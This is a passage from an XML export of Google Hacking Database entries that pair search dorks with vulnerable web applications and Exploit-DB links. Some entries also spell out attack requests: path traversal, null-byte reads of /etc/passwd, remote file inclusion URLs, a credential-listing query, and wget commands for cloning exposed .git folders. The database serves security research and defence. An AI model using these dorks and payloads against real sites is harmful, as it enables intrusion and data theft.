<textualDescription>VP-ASP Shopping Cart 7.0 DB Download Vulnerability: https://www.exploit-db.com/exploits/11018</textualDescription>
<query>Copyright 1999-2010 Rocksalt International Pty Ltd. All rights reserved</query>
<querystring>https://www.google.com/search?q=Copyright+1999-2010+Rocksalt+International+Pty+Ltd.+All+rights+reserved</querystring>
<edb>https://www.exploit-db.com/exploits/11018</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2421</id>
<link>https://www.exploit-db.com/ghdb/2421</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Copyright 2006 © Flax Article Manager v1.1</shortDescription>
<textualDescription>Flax Article Manager 1.1 Remote PHP Script Upload Vulnerability: https://www.exploit-db.com/exploits/7884</textualDescription>
<query>Copyright 2006 © Flax Article Manager v1.1</query>
<querystring>https://www.google.com/search?q=Copyright+2006+%C3%82%C2%A9+Flax+Article+Manager+v1.1</querystring>
<edb>https://www.exploit-db.com/exploits/7884</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2732</id>
<link>https://www.exploit-db.com/ghdb/2732</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Copyright 2006 © Flax Article Manager v1.1</shortDescription>
<textualDescription>Flax Article Manager 1.1 (cat_id) SQL Injection Vulnerability - CVE: 2009-0284: https://www.exploit-db.com/exploits/7862</textualDescription>
<query>Copyright 2006 © Flax Article Manager v1.1</query>
<querystring>https://www.google.com/search?q=Copyright+2006+%C3%82%C2%A9+Flax+Article+Manager+v1.1</querystring>
<edb>https://www.exploit-db.com/exploits/7862</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3371</id>
<link>https://www.exploit-db.com/ghdb/3371</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Copyright 2006-2009 Insane Visions</shortDescription>
<textualDescription>AdaptCMS Lite 1.5 Remote File Inclusion Vulnerability: https://www.exploit-db.com/exploits/10249</textualDescription>
<query>Copyright 2006-2009 Insane Visions</query>
<querystring>https://www.google.com/search?q=Copyright+2006-2009+Insane+Visions</querystring>
<edb>https://www.exploit-db.com/exploits/10249</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2551</id>
<link>https://www.exploit-db.com/ghdb/2551</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Copyright 2007, PHPAUCTION.NET</shortDescription>
<textualDescription>phpAuction 3.2.1 (item.php id) Remote SQL Injection Vulnerability - CVE: 2008-2900: https://www.exploit-db.com/exploits/5892</textualDescription>
<query>Copyright 2007, PHPAUCTION.NET</query>
<querystring>https://www.google.com/search?q=Copyright+2007,+PHPAUCTION.NET</querystring>
<edb>https://www.exploit-db.com/exploits/5892</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2694</id>
<link>https://www.exploit-db.com/ghdb/2694</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Copyright 2008 Free Image &amp; File Hosting</shortDescription>
<textualDescription>Free Image &amp; File Hosting Upload Vulnerability: https://www.exploit-db.com/exploits/12105</textualDescription>
<query>Copyright 2008 Free Image &amp; File Hosting</query>
<querystring>https://www.google.com/search?q=Copyright+2008+Free+Image+%26+File+Hosting</querystring>
<edb>https://www.exploit-db.com/exploits/12105</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2727</id>
<link>https://www.exploit-db.com/ghdb/2727</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Copyright 2010 My Hosting. All rights reserved</shortDescription>
<textualDescription>Hosting-php-dynamic (Auth Bypass) Vulnerability: https://www.exploit-db.com/exploits/11968</textualDescription>
<query>Copyright 2010 My Hosting. All rights reserved</query>
<querystring>https://www.google.com/search?q=Copyright+2010+My+Hosting.+All+rights+reserved</querystring>
<edb>https://www.exploit-db.com/exploits/11968</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2856</id>
<link>https://www.exploit-db.com/ghdb/2856</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Copyright 2010. Software Index</shortDescription>
<textualDescription>PishBini Footbal XSS and SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14000</textualDescription>
<query>Copyright 2010. Software Index</query>
<querystring>https://www.google.com/search?q=Copyright+2010.+Software+Index</querystring>
<edb>https://www.exploit-db.com/exploits/14000</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3449</id>
<link>https://www.exploit-db.com/ghdb/3449</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Copyright 2010. Software Index</shortDescription>
<textualDescription>Software Index (Remote File Upload) Exploit: https://www.exploit-db.com/exploits/13999</textualDescription>
<query>Copyright 2010. Software Index</query>
<querystring>https://www.google.com/search?q=Copyright+2010.+Software+Index</querystring>
<edb>https://www.exploit-db.com/exploits/13999</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2989</id>
<link>https://www.exploit-db.com/ghdb/2989</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Copyright @ 2007 Powered By Hot or Not Clone by Jnshosts.com Rate My Pic :: Home :: Advertise :: Contact us::</shortDescription>
<textualDescription>Hot or Not Clone by Jnshosts.com Database Backup Dump Vulnerability - CVE: 2007-6603: https://www.exploit-db.com/exploits/4804</textualDescription>
<query>Copyright @ 2007 Powered By Hot or Not Clone by Jnshosts.com Rate My Pic :: Home :: Advertise :: Contact us::</query>
<querystring>https://www.google.com/search?q=Copyright+%40+2007+Powered+By+Hot+or+Not+Clone+by+Jnshosts.com+Rate+My+Pic+::+Home+::+Advertise+::+Contact+us::</querystring>
<edb>https://www.exploit-db.com/exploits/4804</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2698</id>
<link>https://www.exploit-db.com/ghdb/2698</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Copyright Acme 2008</shortDescription>
<textualDescription>AJ HYIP ACME (news.php id) Remote SQL Injection Vulnerability - CVE: 2008-2893: https://www.exploit-db.com/exploits/5890</textualDescription>
<query>Copyright Acme 2008</query>
<querystring>https://www.google.com/search?q=Copyright+Acme+2008</querystring>
<edb>https://www.exploit-db.com/exploits/5890</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1838</id>
<link>https://www.exploit-db.com/ghdb/1838</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Copyright Agares Media phpautovideo</shortDescription>
<textualDescription>phpAutoVideo CSRF Vulnerability - OSVDB-ID: 62450: https://www.exploit-db.com/exploits/11502</textualDescription>
<query>Copyright Agares Media phpautovideo</query>
<querystring>https://www.google.com/search?q=Copyright+Agares+Media+phpautovideo</querystring>
<edb>https://www.exploit-db.com/exploits/11502</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2704</id>
<link>https://www.exploit-db.com/ghdb/2704</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Copyright © 2007 Agares Media. Powered by AMCMS3.</shortDescription>
<textualDescription>Arcadem Pro (articlecat) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6624</textualDescription>
<query>Copyright © 2007 Agares Media. Powered by AMCMS3.</query>
<querystring>https://www.google.com/search?q=Copyright+%C3%82%C2%A9+2007+Agares+Media.+Powered+by+AMCMS3.</querystring>
<edb>https://www.exploit-db.com/exploits/6624</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1688</id>
<link>https://www.exploit-db.com/ghdb/1688</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Copyright © 2007 BrowserCRM Ltd</shortDescription>
<textualDescription>BrowserCRM 5.002.00 (clients.php) Remote File Inclusion Vulnerability - CVE: 2008-2689: https://www.exploit-db.com/exploits/5757</textualDescription>
<query>Copyright © 2007 BrowserCRM Ltd</query>
<querystring>https://www.google.com/search?q=Copyright+%C3%82%C2%A9+2007+BrowserCRM+Ltd</querystring>
<edb>https://www.exploit-db.com/exploits/5757</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2136</id>
<link>https://www.exploit-db.com/ghdb/2136</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Copyright © Rotator 2008</shortDescription>
<textualDescription>YourFreeWorld URL Rotator (id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6949</textualDescription>
<query>Copyright © Rotator 2008</query>
<querystring>https://www.google.com/search?q=Copyright+%C3%82%C2%A9++Rotator+2008</querystring>
<edb>https://www.exploit-db.com/exploits/6949</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2180</id>
<link>https://www.exploit-db.com/ghdb/2180</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Copyright © Viral Marketing 2008</shortDescription>
<textualDescription>YourFreeWorld Viral Marketing (id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6941</textualDescription>
<query>Copyright © Viral Marketing 2008</query>
<querystring>https://www.google.com/search?q=Copyright+%C3%82%C2%A9+Viral+Marketing+2008</querystring>
<edb>https://www.exploit-db.com/exploits/6941</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3244</id>
<link>https://www.exploit-db.com/ghdb/3244</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Copyright © 2007 by Horst-D. Kröller · CMS: php WCMS</shortDescription>
<textualDescription>php wcms XT 0.0.7 Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-5185: https://www.exploit-db.com/exploits/4477</textualDescription>
<query>Copyright © 2007 by Horst-D. Kröller · CMS: php WCMS</query>
<querystring>https://www.google.com/search?q=Copyright+%C2%A9+2007+by+Horst-D.+Kr%C3%B6ller+%C2%B7+CMS:+php+WCMS</querystring>
<edb>https://www.exploit-db.com/exploits/4477</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2476</id>
<link>https://www.exploit-db.com/ghdb/2476</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Copyright © 2010 ASP SiteWare. All rights reserved.</shortDescription>
<textualDescription>MSSQLi Vulnerability in AutoDealer Ver.1 and Ver.2 - CVE: 2007-0053: https://www.exploit-db.com/exploits/12462</textualDescription>
<query>Copyright © 2010 ASP SiteWare. All rights reserved.</query>
<querystring>https://www.google.com/search?q=Copyright+%C2%A9+2010+ASP+SiteWare.+All+rights+reserved.</querystring>
<edb>https://www.exploit-db.com/exploits/12462</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3022</id>
<link>https://www.exploit-db.com/ghdb/3022</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Copyright ©2007-2009 by Kasseler CMS. All rights reserved.</shortDescription>
<textualDescription>Kasseler CMS 2.0.5 =&gt; By Pass / Download Backup Vulnerability - CVE: 2009-4822: https://www.exploit-db.com/exploits/12402</textualDescription>
<query>Copyright ©2007-2009 by Kasseler CMS. All rights reserved.</query>
<querystring>https://www.google.com/search?q=Copyright+%C2%A92007-2009+by+Kasseler+CMS.+All+rights+reserved.</querystring>
<edb>https://www.exploit-db.com/exploits/12402</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2051</id>
<link>https://www.exploit-db.com/ghdb/2051</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Créé par Narfight, ClanLite V2.2006.05.20 © 2000-2005</shortDescription>
<textualDescription>ClanLite 2.x (SQL Injection/XSS) Multiple Remote Vulnerabilities - CVE: 2008-5215: https://www.exploit-db.com/exploits/5595</textualDescription>
<query>Créé par Narfight, ClanLite V2.2006.05.20 © 2000-2005</query>
<querystring>https://www.google.com/search?q=Cr%C3%83%C2%A9%C3%83%C2%A9+par+Narfight,+ClanLite+V2.2006.05.20+%C3%82%C2%A9+2000-2005</querystring>
<edb>https://www.exploit-db.com/exploits/5595</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1471</id>
<link>https://www.exploit-db.com/ghdb/1471</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>DA Mailing List System V2 Powered by DigitalArakan.Net</shortDescription>
<textualDescription>DA Mailing List System V2 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/11348</textualDescription>
<query>DA Mailing List System V2 Powered by DigitalArakan.Net</query>
<querystring>https://www.google.com/search?q=DA+Mailing+List+System+V2+Powered+by+DigitalArakan.Net</querystring>
<edb>https://www.exploit-db.com/exploits/11348</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3257</id>
<link>https://www.exploit-db.com/ghdb/3257</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Design by Satcom Co</shortDescription>
<textualDescription>Eshopbuilde CMS SQL Injection Vulnerability - CVE: 2009-4155: https://www.exploit-db.com/exploits/10253</textualDescription>
<query>Design by Satcom Co</query>
<querystring>https://www.google.com/search?q=Design+by+Satcom+Co</querystring>
<edb>https://www.exploit-db.com/exploits/10253</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2316</id>
<link>https://www.exploit-db.com/ghdb/2316</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Designed and Developed by karkia E-commerce</shortDescription>
<textualDescription>E-commerce Group (cat.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12696</textualDescription>
<query>Designed and Developed by karkia E-commerce</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=Designed+and+Developed+by+karkia+%3Chttp://www.karkia.org/%3E+E-commerce</querystring>
<edb>https://www.exploit-db.com/exploits/12696</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1981</id>
<link>https://www.exploit-db.com/ghdb/1981</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Designed by:InterTech Co</shortDescription>
<textualDescription>InterTech Co 1.0 SQL Injection: https://www.exploit-db.com/exploits/11440</textualDescription>
<query>Designed by:InterTech Co</query>
<querystring>https://www.google.com/search?q=Designed+by:InterTech+Co</querystring>
<edb>https://www.exploit-db.com/exploits/11440</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1511</id>
<link>https://www.exploit-db.com/ghdb/1511</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>details.php?p_id=</shortDescription>
<textualDescription>The iceberg 'Content Management System' SQL Injection Vulnerability - CVE: 2010-2016: https://www.exploit-db.com/exploits/12620</textualDescription>
<query>details.php?p_id=</query>
<querystring>https://www.google.com/search?q=details.php%3Fp_id%3D</querystring>
<edb>https://www.exploit-db.com/exploits/12620</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2574</id>
<link>https://www.exploit-db.com/ghdb/2574</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>developed by ARWScripts.com</shortDescription>
<textualDescription>Free Photo Gallery Site Script (path) File Disclosure Vulnerability - CVE: 2008-1730: https://www.exploit-db.com/exploits/5419</textualDescription>
<query>developed by ARWScripts.com</query>
<querystring>https://www.google.com/search?q=developed+by+ARWScripts.com</querystring>
<edb>https://www.exploit-db.com/exploits/5419</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2670</id>
<link>https://www.exploit-db.com/ghdb/2670</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>DevMass Shopping Cart</shortDescription>
<textualDescription>DevMass Shopping Cart 1.0 Remote File Include Vulnerability - CVE: 2007-6133: https://www.exploit-db.com/exploits/4642</textualDescription>
<query>DevMass Shopping Cart</query>
<querystring>https://www.google.com/search?q=DevMass+Shopping+Cart</querystring>
<edb>https://www.exploit-db.com/exploits/4642</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1468</id>
<link>https://www.exploit-db.com/ghdb/1468</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>display_blog.php</shortDescription>
<textualDescription>Social Site Generator (sgc_id) Remote SQL Injection Vulnerability - CVE: 2008-6419: https://www.exploit-db.com/exploits/5701</textualDescription>
<query>display_blog.php</query>
<querystring>https://www.google.com/search?q=display_blog.php</querystring>
<edb>https://www.exploit-db.com/exploits/5701</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2441</id>
<link>https://www.exploit-db.com/ghdb/2441</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Doop CMS</shortDescription>
<textualDescription>doop CMS 1.3.7 (page) Local File Inclusion Vulnerability - CVE: 2007-5465: https://www.exploit-db.com/exploits/4536</textualDescription>
<query>Doop CMS</query>
<querystring>https://www.google.com/search?q=Doop+CMS</querystring>
<edb>https://www.exploit-db.com/exploits/4536</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2680</id>
<link>https://www.exploit-db.com/ghdb/2680</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Dosya Yukle Scrtipi v1.0</shortDescription>
<textualDescription>Dosya Yukle Scrtipi v1.0 Shell Upload Vulnerability: https://www.exploit-db.com/exploits/11620</textualDescription>
<query>Dosya Yukle Scrtipi v1.0</query>
<querystring>https://www.google.com/search?q=Dosya+Yukle+Scrtipi+v1.0</querystring>
<edb>https://www.exploit-db.com/exploits/11620</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3124</id>
<link>https://www.exploit-db.com/ghdb/3124</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>E-Commerce Engine Copyright © 2005 osCSS</shortDescription>
<textualDescription>osCSS 1.2.1 (REMOTE FILE UPLOAD) Vulnerabilities: https://www.exploit-db.com/exploits/12856</textualDescription>
<query>E-Commerce Engine Copyright © 2005 osCSS</query>
<querystring>https://www.google.com/search?q=E-Commerce+Engine+Copyright+%C2%A9+2005+osCSS</querystring>
<edb>https://www.exploit-db.com/exploits/12856</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>468</id>
<link>https://www.exploit-db.com/ghdb/468</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>E-market remote code execution</shortDescription>
<textualDescription>E-market is commercial software made by a korean company(http://www.bbs2000.co.kr). A vulnerability in this software was reported to Bugtraq. The exploit is possible with the index.php script:http://[TARGET]/becommunity/community/index.php?pageurl=[injection URL]http://[TARGET]/becommunity/community/index.php?from_market=Y&amp;pageurl=[injection URL] For more information read this:http://echo.or.id/adv/adv06-y3dips-2004.txt Author: y3dipsDate: Sept, 7th 2004Location: Indonesian, Jakarta</textualDescription>
<query>inurl:&quot;/becommunity/community/index.php?pageurl=&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22%2Fbecommunity%2Fcommunity%2Findex.php%3Fpageurl%3D%22&amp;sourceid=mozilla-search&amp;start=0&amp;start=0</querystring>
<edb></edb>
<date>2004-09-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>64</id>
<link>https://www.exploit-db.com/ghdb/64</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>EarlyImpact Productcart</shortDescription>
<textualDescription>The EarlyImpact Productcart contains multiple vulnerabilites, which could exploited to allow an attacker to steal user credentials or mount other attacks. See http://www.securityfocus.com/bid/9669 for more informationfor more information. Also see http://www.securityfocus.com/bid/9677for information about an information leakage vulnerability in versions YaBB Gold - Sp 1.3.1 and others.</textualDescription>
<query>inurl:custva.asp</query>
<querystring>https://www.google.com/search?q=inurl%3ACustva.asp+</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>2216</id>
<link>https://www.exploit-db.com/ghdb/2216</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>elkagroup - Image Gallery v1.0 - All right reserved</shortDescription>
<textualDescription>elkagroup Image Gallery 1.0 Arbitrary File Upload Vulnerability - CVE: 2009-1446: https://www.exploit-db.com/exploits/8514</textualDescription>
<query>elkagroup - Image Gallery v1.0 - All right reserved</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=elkagroup+-+Image+Gallery+v1.0+-++All+right+reserved</querystring>
<edb>https://www.exploit-db.com/exploits/8514</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1642</id>
<link>https://www.exploit-db.com/ghdb/1642</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Engine powered by easyLink V1.1.0.</shortDescription>
<textualDescription>easyLink 1.1.0 (detail.php) Remote SQL Injection Vulnerability - CVE: 2008-6471: https://www.exploit-db.com/exploits/6494</textualDescription>
<query>Engine powered by easyLink V1.1.0.</query>
<querystring>https://www.google.com/search?q=Engine+powered+by+easyLink+V1.1.0.</querystring>
<edb>https://www.exploit-db.com/exploits/6494</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2077</id>
<link>https://www.exploit-db.com/ghdb/2077</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Events Calendar 1.1</shortDescription>
<textualDescription>Events Calendar 1.1 Remote File Inclusion Vulnerability - CVE: 2008-4673: https://www.exploit-db.com/exploits/6623</textualDescription>
<query>Events Calendar 1.1</query>
<querystring>https://www.google.com/search?q=Events+Calendar+1.1</querystring>
<edb>https://www.exploit-db.com/exploits/6623</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>780</id>
<link>https://www.exploit-db.com/ghdb/780</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>ext:php intext:&quot;Powered by phpNewMan Version&quot;</shortDescription>
<textualDescription>PHP News Manager is a multi-platform compatible solution for managing websites and multi-user access. Features weekly poll management, gallery management, partners list management, public news support, and a lot more. PHP News Manager is vulnerable to a directory traversal problem. path/to/news/browse.php?clang=../../../../../../file/i/want</textualDescription>
<query>ext:php intext:&quot;Powered by phpNewMan Version&quot;</query>
<querystring>https://www.google.com/search?q=ext:php+intext:%22Powered+by+phpNewMan+Version%22+</querystring>
<edb></edb>
<date>2004-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>4288</id>
<link>https://www.exploit-db.com/ghdb/4288</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>ext:php inurl:&quot;api.php?action=&quot;</shortDescription>
<textualDescription>ext:php inurl:&quot;api.php?action=&quot;
XenAPI/XenForo SQLi Vulnerability
https://www.exploit-db.com/exploits/39849/</textualDescription>
<query>ext:php inurl:&quot;api.php?action=&quot;</query>
<querystring>https://www.google.com/search?q=ext:php inurl:&quot;api.php?action=&quot;</querystring>
<edb>https://www.exploit-db.com/exploits/39849</edb>
<date>2016-05-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>416</id>
<link>https://www.exploit-db.com/ghdb/416</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>ext:pl inurl:cgi intitle:&quot;FormMail *&quot; -&quot;*Referrer&quot; -&quot;* Denied&quot; -sourceforge -error -cvs -input</shortDescription>
<textualDescription>FormMail is a Perl script written by Matt Wright to send mail with sendmail from the cgi-gateway. Early version didn' have a referer check. New versions could be misconfigured. Spammers are known to hunt them down (by means of cgi-scanning) and abuse them for their own evil purposes if the admin forgot to check the settings.http://www.securityfocus.com/bid/3954/discussion/</textualDescription>
<query>ext:pl inurl:cgi intitle:&quot;FormMail *&quot; -&quot;*Referrer&quot; -&quot;* Denied&quot; -sourceforge -error -cvs -input</query>
<querystring>https://www.google.com/search?num=100&amp;q=ext%3Apl+inurl%3Acgi+intitle%3A%22FormMail+*%22++-%22*Referrer%22+-%22*+Denied%22+-sourceforge+-error+-cvs+-input</querystring>
<edb></edb>
<date>2004-08-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>1884</id>
<link>https://www.exploit-db.com/ghdb/1884</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>eXV2 MyAnnonces</shortDescription>
<textualDescription>eXV2 Module MyAnnonces (lid) Remote SQL Injection Vulnerability - CVE: 2008-1406: https://www.exploit-db.com/exploits/5252</textualDescription>
<query>eXV2 MyAnnonces</query>
<querystring>https://www.google.com/search?q=eXV2+MyAnnonces</querystring>
<edb>https://www.exploit-db.com/exploits/5252</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2293</id>
<link>https://www.exploit-db.com/ghdb/2293</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>faqview.asp?key</shortDescription>
<textualDescription>Techno Dreams FAQ Manager 1.0 Remote SQL Injection Vulnerability - CVE: 2006-4892: https://www.exploit-db.com/exploits/2385</textualDescription>
<query>faqview.asp?key</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=faqview.asp%3Fkey</querystring>
<edb>https://www.exploit-db.com/exploits/2385</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3444</id>
<link>https://www.exploit-db.com/ghdb/3444</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>FhImage, powered by Flash-here.com</shortDescription>
<textualDescription>Fhimage 1.2.1 Remote Index Change: https://www.exploit-db.com/exploits/7820</textualDescription>
<query>FhImage, powered by Flash-here.com</query>
<querystring>https://www.google.com/search?q=FhImage,+powered+by+Flash-here.com</querystring>
<edb>https://www.exploit-db.com/exploits/7820</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3502</id>
<link>https://www.exploit-db.com/ghdb/3502</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>FhImage, powered by Flash-here.com</shortDescription>
<textualDescription>Fhimage 1.2.1 Remote Command Execution: https://www.exploit-db.com/exploits/7821</textualDescription>
<query>FhImage, powered by Flash-here.com</query>
<querystring>https://www.google.com/search?q=FhImage,+powered+by+Flash-here.com</querystring>
<edb>https://www.exploit-db.com/exploits/7821</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>618</id>
<link>https://www.exploit-db.com/ghdb/618</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>filetype:cgi inurl:nbmember.cgi</shortDescription>
<textualDescription>vulnerable Netbilling nbmember.cgiNetbilling 'nbmember.cgi' script is reported prone to an information disclosure vulnerability. This issue may allow remote attackers to gain access to user authentication credentials and potentially sensitive configuration information.The following proof of concept is available:http://www.example.com/cgi-bin/nbmember.cgi?cmd=testhttp://www.example.com/cgi-bin/nbmember.cgi?cmd=list_all_users&amp;keyword=hereistheaccesskeywordhttp://www.securityfocus.com/bid/11504</textualDescription>
<query>filetype:cgi inurl:nbmember.cgi</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=filetype%3Acgi+inurl%3Anbmember.cgi</querystring>
<edb></edb>
<date>2004-10-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>501</id>
<link>https://www.exploit-db.com/ghdb/501</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>filetype:cgi inurl:pdesk.cgi</shortDescription>
<textualDescription>PerlDesk is a web based help desk and email management application designed to streamline support requests, with built in tracking and response logging.http://www.securitytracker.com/alerts/2004/Sep/1011276.html</textualDescription>
<query>filetype:cgi inurl:pdesk.cgi</query>
<querystring>https://www.google.com/search?q=filetype%3Acgi+inurl%3Apdesk.cgi</querystring>
<edb></edb>
<date>2004-09-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>492</id>
<link>https://www.exploit-db.com/ghdb/492</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>filetype:cgi inurl:tseekdir.cgi</shortDescription>
<textualDescription>The Turbo Seek search engine has a vulnerability. The removed user can look at the contents of files on target. A removed user can request an URL with name of a file, which follows NULL byte (%00) to force system to display the contents of a required file, for example:/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00/cgi-bin/tseekdir.cgi?id=799*location=/etc/passwd%00 More: http://www.securitytracker.com/alerts/2004/Sep/1011221.html</textualDescription>
<query>filetype:cgi inurl:tseekdir.cgi</query>
<querystring>https://www.google.com/search?q=filetype%3Acgi+inurl%3Atseekdir.cgi</querystring>
<edb></edb>
<date>2004-09-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>4544</id>
<link>https://www.exploit-db.com/ghdb/4544</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>filetype:ini &quot;wordfence&quot;</shortDescription>
<textualDescription>Google Dork: filetype:ini &quot;wordfence&quot;
Description: finds WordPress websites that are running the Wordfence WAF,
and by proxy, reveals the full site directory path.
Author: echobb8</textualDescription>
<query>filetype:ini &quot;wordfence&quot;</query>
<querystring>https://www.google.com/search?q=filetype:ini &quot;wordfence&quot;</querystring>
<edb></edb>
<date>2017-07-07</date>
<author>echobb8</author>
</entry>
<entry>
<id>4593</id>
<link>https://www.exploit-db.com/ghdb/4593</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>filetype:php &quot;Git Deployment Script v0.1&quot;</shortDescription>
<textualDescription>Query : filetype:php &quot;Git Deployment Script v0.1&quot;
Vulnerable php git deployment script : https://gist.github.com/oodavid/1809044
- Discloses all files not contained in the git repository
- Most users do not secure their .git folder so you can clone their repo
For a result [exemple.com/path/deploy.php](http://exemple.com/deploy.php)
- wget -r -np exemple.com/path/.git/
- cd ./exemple.com/path/.git/
- git reset --hard
- You have a copy of the website content
- Cringe
Nate</textualDescription>
<query>filetype:php &quot;Git Deployment Script v0.1&quot;</query>
<querystring>https://www.google.com/search?q=filetype:php &quot;Git Deployment Script v0.1&quot;</querystring>
<edb></edb>
<date>2017-10-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>908</id>
<link>https://www.exploit-db.com/ghdb/908</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>filetype:php intitle:&quot;paNews v2.0b4&quot;</shortDescription>
<textualDescription>PaNews is reported prone to a remote PHP script code execution vulnerability. It is reported that PHP script code may be injected into the PaNews software through the 'showcopy' parameter of the 'admin_setup.php' script. http://www.securityfocus.com/bid/12611</textualDescription>
